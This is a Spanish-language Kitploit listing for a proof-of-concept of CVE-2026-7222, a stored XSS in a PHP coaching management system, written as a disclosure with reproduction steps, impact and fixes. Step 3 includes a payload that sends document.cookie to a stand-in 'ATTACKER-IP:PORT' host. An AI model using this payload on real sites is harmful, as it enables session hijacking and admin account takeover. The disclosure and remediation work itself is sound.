Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-7222-XSS — Exploit de prueba de concepto para XSS almacenado (CWE-79) en un sistema de gestión de coaching en PHP, que demuestra secuestro de sesión y escalada de privilegios de estudiante a administrador mediante robo de cookies. | Kitploit
Herramientas/GitHubGitHub/xmyronn/cve-2026-7222-xss
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubxmyronn/cve-2026-7222-xss

CVE-2026-7222-XSS

Exploit de prueba de concepto para XSS almacenado (CWE-79) en un sistema de gestión de coaching en PHP, que demuestra secuestro de sesión y escalada de privilegios de estudiante a administrador mediante robo de cookies.

Ver Repositorio
4hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Cross-Site Scripting (XSS) Almacenado en el Sistema de Gestión de Coaching Permite la Toma de Control de la Cuenta


Producto

Sistema de Gestión de Coaching en PHP (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/


Componentes Afectados

  • /modules/student/complaint.php (Envío de Quejas)
  • /modules/admin/incomingcomplaint.php (Visualización de Quejas)
  • Funcionalidad de Respuesta a Quejas (Admin/Profesor → Estudiante)

Versión

Desconocida (El proveedor no proporcionó información de versión; probado en la última versión disponible de Code-Projects.org a partir de abril de 2026)


Tipo de Vulnerabilidad

CWE-79: Neutralización Incorrecta de la Entrada Durante la Generación de la Página Web (Cross-Site Scripting Almacenado)


Descripción

La aplicación no sanea adecuadamente la entrada proporcionada por el usuario en la funcionalidad de quejas y respuestas. El JavaScript malicioso inyectado por un usuario con privilegios bajos se almacena y se ejecuta cuando lo ven usuarios con privilegios más altos, como administradores o profesores.

Además, la funcionalidad de respuesta también es vulnerable, lo que permite a los administradores o profesores inyectar JavaScript que se ejecuta en las sesiones de los estudiantes.

Esto da como resultado una vulnerabilidad de XSS almacenado que afecta a múltiples roles de usuario.


Pasos para Reproducir

Caso 1: Estudiante → Admin (Escalada de Privilegios)

  1. Iniciar sesión como Estudiante

  2. Navegar a: /modules/student/complaint.php Captura de pantalla 2026-04-10 212940

  3. Enviar una queja con el siguiente payload:

root@kitploit:~
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
Captura de pantalla 2026-04-10 213341
  1. Iniciar sesión como Admin

  2. Navegar a: /modules/admin/incomingcomplaint.php Captura de pantalla 2026-04-10 212951

  3. Cuando el admin ve la queja, el payload se ejecuta automáticamente

  4. La cookie de sesión del admin se envía al servidor controlado por el atacante

  5. Usar la cookie de sesión robada para secuestrar la sesión del admin Captura de pantalla 2026-04-10 213350

    Captura de pantalla 2026-04-10 213406

Caso 2: Admin → Estudiante (XSS Inverso)

  1. Iniciar sesión como Admin
  2. Responder a una queja usando el payload:
root@kitploit:~
  1. Iniciar sesión como Estudiante
  2. Ver la respuesta a la queja

Evidencia de Prueba de Concepto

  • Ejecución de JavaScript confirmada en el panel de administración al ver la queja maliciosa
  • Cookie de sesión (PHPSESSID) exfiltrada con éxito mediante un servidor controlado por el atacante
  • Sesión de administrador secuestrada usando la cookie robada
  • Ejecución de JavaScript confirmada en el panel de estudiante mediante la funcionalidad de respuesta

Impacto

  • Los usuarios con privilegios bajos (estudiantes) pueden ejecutar JavaScript arbitrario en el contexto del administrador
  • Conduce al secuestro de sesión debido a la ausencia de la bandera HttpOnly
  • Toma de control total de la cuenta administrativa
  • El XSS bidireccional permite comprometer múltiples roles (Admin, Profesor, Estudiante)
  • Compromiso total de la integridad, confidencialidad y disponibilidad de la aplicación

Severidad: CRÍTICA


Causa Raíz

  • Falta de saneamiento de entradas
  • Ausencia de codificación de salidas
  • Controles de seguridad ausentes en las cookies de sesión (bandera HttpOnly no establecida)

Recomendación

  • Sanear y validar todas las entradas del usuario.
  • Codificar las salidas usando funciones como htmlspecialchars() en PHP
  • Establecer las banderas HttpOnly y Secure en las cookies de sesión
  • Implementar una Política de Seguridad de Contenido (CSP)

Descargar herramienta